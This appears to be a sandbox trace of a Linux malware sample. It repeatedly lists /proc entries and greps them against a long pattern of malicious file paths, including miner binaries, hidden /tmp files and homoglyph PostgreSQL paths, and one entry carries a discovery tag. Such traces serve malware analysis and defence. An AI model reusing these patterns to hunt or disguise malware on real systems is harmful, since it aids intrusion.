/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1261
-
-
/bin/grepgrep exe2⤵PID:1265
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1264
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1268
-
-
/bin/grepgrep exe2⤵PID:1271
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1270
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1274
-
-
/bin/grepgrep exe2⤵PID:1278
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1277
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1280
-
-
/bin/grepgrep exe2⤵PID:1284
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1283
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1287
-
-
/bin/grepgrep exe2⤵PID:1291
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1290
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1294
-
-
/bin/grepgrep exe2⤵PID:1297
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1296
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1300
-
-
/bin/grepgrep exe2⤵PID:1304
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1303
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1306
-
-
/bin/grepgrep exe2⤵PID:1310
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1309
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1313
-
-
/bin/grepgrep exe2⤵PID:1317
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1316
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1320
-
-
/bin/grepgrep exe2⤵PID:1326
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1325
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1330
-
-
/bin/grepgrep exe2⤵PID:1333
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1332
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1336
-
-
/bin/grepgrep exe2⤵PID:1340
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1339
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1342
-
-
/bin/grepgrep exe2⤵PID:1346
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1345
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1349
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1356
-
-
/bin/grepgrep exe2⤵PID:1359
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1358
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1362
-
-
/bin/grepgrep exe2⤵PID:1366
-
-
/bin/lsls -latrh /proc/net2⤵PID:1365
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1368
-
-
/bin/grepgrep exe2⤵PID:1371
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1370
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1373
-
-
/bin/grepgrep exe2⤵PID:1376
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1375
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1378
-
-
/bin/grepgrep exe2⤵PID:1381
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1380
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1383
-
-
/bin/grepgrep exe2⤵PID:1386
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1385
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1388
-
-
/bin/grepgrep exe2⤵PID:1391
-
-
/bin/lsls -latrh /proc/self2⤵PID:1390
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1393
-
-
/bin/grepgrep exe2⤵PID:1396
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1395
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1398
-
-
/bin/grepgrep exe2⤵PID:1401
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1400
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1403
-
-
/bin/grepgrep exe2⤵PID:1406
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1405
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1408
-
-
/bin/grepgrep exe2⤵PID:1411
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1410
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1413
-
-
/bin/grepgrep exe2⤵PID:1416
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1415
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1418
-
-
/bin/grepgrep exe2⤵PID:1421
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1420
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1423
-
-
/bin/grepgrep exe2⤵PID:1426
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1425
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1428
-
-
/bin/grepgrep exe2⤵PID:1431
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1430
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1433
-
-
/bin/grepgrep exe2⤵PID:1436
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1435
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1438
-
-
/bin/grepgrep exe2⤵PID:1441
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1440
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1443
-
-
/bin/grepgrep exe2⤵PID:1446
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1445
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1448
-
-
/bin/grepgrep exe2⤵PID:1451
-
-
/bin/lsls -latrh /proc/version2⤵PID:1450
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1453
-
-
/bin/grepgrep exe2⤵PID:1456
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1455
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1458
-
-
/bin/grepgrep exe2⤵PID:1461
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1460
-
-
